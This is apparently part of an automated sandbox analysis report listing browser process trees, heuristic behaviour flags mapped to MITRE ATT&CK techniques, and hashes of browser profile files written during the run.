    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.6.293827819\1116260816" -childID 5 -isForBrowser -prefsHandle 5224 -prefMapHandle 5220 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {34a64647-aa09-46a6-90fb-c11c9e8d48f0} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 5232 24baa28ae58 tab
    3⤵
    PID:5612
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2428.7.2083120204\252025159" -childID 6 -isForBrowser -prefsHandle 5692 -prefMapHandle 5688 -prefsLen 27692 -prefMapSize 235121 -jsInitHandle 1272 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a582efe-d4a0-470f-a43d-c3502c058b1a} 2428 "\\.\pipe\gecko-crash-server-pipe.2428" 5604 24ba2a29a58 tab
    3⤵
    PID:5332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
PID:6668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0x11c,0x12c,0x7ff8ac0cab58,0x7ff8ac0cab68,0x7ff8ac0cab78
  2⤵
  PID:6688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1684 --field-trial-handle=1996,i,5798649413104053076,1722383027901733685,131072 /prefetch:2
  2⤵
  PID:6200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=1996,i,5798649413104053076,1722383027901733685,131072 /prefetch:8
  2⤵
  PID:6320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6736
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ac0cab58,0x7ff8ac0cab68,0x7ff8ac0cab78
  2⤵
  PID:6748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1616 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:2
  2⤵
  PID:7008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1900 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:8
  2⤵
  PID:7016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1736 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:8
  2⤵
  PID:7024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:1
  2⤵
  PID:7148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3108 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:1
  2⤵
  PID:4500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:1
  2⤵
  PID:6792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:8
  2⤵
  PID:5564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 --field-trial-handle=2108,i,2994361675216901937,2149462410265705705,131072 /prefetch:8
  2⤵
  PID:4216

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:6520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
23e6ef5a90e33c22bae14f76f2684f3a

SHA1
77c72b67f257c2dde499789fd62a0dc0503f3f21

SHA256
62d7beeb501a1dcd8ce49a2f96b3346f4a7823c6f5c47dac0e6dc6e486801790

SHA512
23be0240146ba8d857fc8d37d77eb722066065877d1f698f0d3e185fcdae3daf9e1b2580a1db839c1356a45b599996d5acc83fda2af36840d3a8748684df5122

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
00d4aa2952dd38f10359d121e1f214da

SHA1
0834dd8fc41b44473f172849b64faa66fef0bf39

SHA256
c162938110ed00d86ab16019fec417f2e41a2ec3bede858dd9327a7d64be7a8c

SHA512
2d62aa4b1d1aa28a23bb6155e7599556da9dc5dc17b99327ae5a8f96bae4ec92d0ff5cb8827fb85715c8dd2e8c68aa3f837b1b000c9b36daf24c4ba65b416945

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
41088c8af86932226bb4ed62d358d013

SHA1
062c4d0afb98c7b8cdec9e96261842c63cdc8c61

SHA256
61546ee81ae305a3e703cd8269aaac2e119cf3791f0923addeeaa2438503e816

SHA512
1fea9afdfc94f4c183e3374c056006a3761e691e93fd1bcc53a6a6241c4a91ac4e2ba45a56ce16937207331cc33650a4325d647768284f8eeb4aae24f998134f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
255KB

MD5
f13efb307e46e4d0f1970ff5470d8e1f

SHA1
d6a2638b3d2a1ce2960419cd09cff90e657bc412

SHA256
08481638efe0c1a6fe4098169b466428c570ba2cb12aced1cb53f2ecc8e41e21

SHA512
329c40aea237adb8893ae35a6f705cf14ff5073a9cb528552a5ac9257b878153c91ce04525cbae0d1d15fdbaaa5ee277f600f7d46cddd87f8b9add2dd0123f38

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
86B

MD5
f732dbed9289177d15e236d0f8f2ddd3

SHA1
53f822af51b014bc3d4b575865d9c3ef0e4debde

SHA256
2741df9ee9e9d9883397078f94480e9bc1d9c76996eec5cfe4e77929337cbe93

SHA512
b64e5021f32e26c752fcba15a139815894309b25644e74ceca46a9aa97070bca3b77ded569a9bfd694193d035ba75b61a8d6262c8e6d5c4d76b452b38f5150a4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a8e767fd33edd97d306efb6905f93252

SHA1
a6f80ace2b57599f64b0ae3c7381f34e9456f9d3

SHA256
c8077a9fc79e2691ef321d556c4ce9933ca0570f2bbaa32fa32999dfd5f908bb

SHA512
07b748582fe222795bce74919aa06e9a09025c14493edb6f3b1f112d9a97ac2225fe0904cac9adf2a62c98c42f7877076e409803014f0afd395f4cc8be207241

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
439b5e04ca18c7fb02cf406e6eb24167

SHA1
e0c5bb6216903934726e3570b7d63295b9d28987

SHA256
247d0658695a1eb44924a32363906e37e9864ba742fe35362a71f3a520ad2654

SHA512
d0241e397060eebd4535197de4f1ae925aa88ae413a3a9ded6e856b356c4324dfd45dddfef9a536f04e4a258e8fe5dc1586d92d1d56b649f75ded8eddeb1f3e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
bc39b62205dad05972efb881fb256fdf

SHA1
f7db71738043e2fc2ad6adb53e77faaf510e4db9

SHA256
55f2c9cc3bd6c85f45d724cbf142a2ea8f0e9e1ae219eb64e38053cffc97ebbc

SHA512
d6c1001e424787da2710469f52433729aac20d849ba6ae7452eea825e2f798936554874272e86020acdc32fb35f3708faf7e481ca9d7051e2422fea8371024b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
2fa049ca1374bc39603044f7101370fc

SHA1
8ebe45ac0e4eab3653d7a711fa0b76fa685bb6b9

SHA256
e637844904d8f91b86f7b3dcf58c0e5de789c25300f9fcc959605dfa6ec53ccd

SHA512
bee2284cfb997a899536e534216dbacf8d3fe3784693635d5e0aa4e07edc0dc3dac3d32f0c73f6fb4bc529ad2a8c54c01599ab0a0f480fdbaf2bf667b755a38b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
427411145f5438c403c05d7aa2e6f547

SHA1
37205016712dc2921bced7419bbbe79f599821c1

SHA256
9702f4ff4aac34204b929f4d7752892940c9b668c0710c01bfa2226aed81e60c

SHA512
4a8965ef6b1daf4ff877902e746e590c0fd8ab31a74efd56513eed905e248c4b84f221a869e8e3b0c808d950c75392844da9d65f35eca14af22b52ce88c8e78f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bcebdbdc51eade17057b4296a12523e1

SHA1
79bf1bcf7b8111afdbf85d0e573dd7e30bc4470e

SHA256
92737692a3dd5433d3a1a45b7db5521f0a06e852f7c5af668646367d2df4556a

SHA512
976dee119f91ca1865725664a41cc2268cf34fe040b82e6c39bc64322be43a74f3375cf816484e823329b704c06bf1da82f174222be5f5375f720fee13f9c695

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
bd2e3b4c64a0c7a75fc2377c2c41d150

SHA1
a24be3255dce2910e6febfa63955fffddb8982f0

SHA256
b07f1ef7fb54b43e3f2f9e7a487107828b7255c07db6b49d8a704706d1dc35b4

SHA512
974eac9e7c0d4d77d40ceb05363e62318a04574c62692fe2563b0a871228b243b14b49c4f472bb9e7327c243deefc5191cb54799e29d91f9ac45ba4f1678fea7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
a25a1c10db1e9f3d1e6d46335e3b21a8

SHA1
c76e71bb2fbb8efedb2c24e6de85793b0a46d94a

SHA256
c46a2911369b447822d2a3f61f159d009cbc19e1abd0782f0afe0755a2b7c886

SHA512
a070419ab6b4ceefd8e79fa7c09e2dd3f5e76f17c9efbc16ec3a244150b3b97a758049c2de15c6dfefd56638044ae2d953bcf56fe42e79cf6f6bee3aa9a4177c

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\afevplna.default-release\activity-stream.discovery_stream.json.tmp

Filesize
26KB

MD5
38c2fb34e38a86b8bce5a7ff74ce2806

SHA1
5dd4539f2e6c62f93f958f5f0e76293f3bbe09f8

SHA256
650a1f15b5ce8181722d9b8ee168ca70aa1223f1ee10e45c0122da2d5d78e130

SHA512
b79d090075be4fef3c9f97b77f10e2be701c5d8bcf14074d8d588daee87b3a825747c349297d838322d7b540679df5a6a67cbed2f23759fb74ee223aa71a2476

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\prefs-1.js

Filesize
7KB

MD5
72eda3f05d640f35d60845670121c9da

SHA1
abe56b087b96832eac9854bf65c3830db024009a

SHA256
7fbbb54269b9ea93aa3a2c73086b13c43cbaac7e570a772ee210161ab8c05ca3

SHA512
215d44a4943639edcb696874426ae0f2ddb03b60c922fb995cf81be75a187674d309e6e96eb94f94ef0083b0076a99aec371b6c881daf6ddd3db6d973a33bcb8

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
311c36f01ed28942c16ecafc93262d64

SHA1
5dd8249dd8acbc50612cdf2c0d7c1d59af4e5672

SHA256
30f0d5715addc3150cbfc393b1ddf7f92f02bfaf410a6b104440b0f9ce742bc9

SHA512
501438bd46cda921fda79d49ac67ddbdfb6cd51cb61297cca70b91670185339569e283dad8a4a6335f78091b99de433605bccf2c284a6e48564cb22e418b1280

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\afevplna.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
e9b57a1c4a4f955504be24be9551af5e

SHA1
7b677e24bab1eb1f2085be4b2676fa12806b2597

SHA256
1296d060afd7db901b9aa24fb25491a34c9ed99c920300b81696179207a5efa5

SHA512
eb1d4099aabc229fac05cc86e415c5f9ab447414e171c60b53122fc7f1a0bf493421bef172204faf14e39ab9e506a5580774acdc281d7328b88d4284b17b940e

Download Submit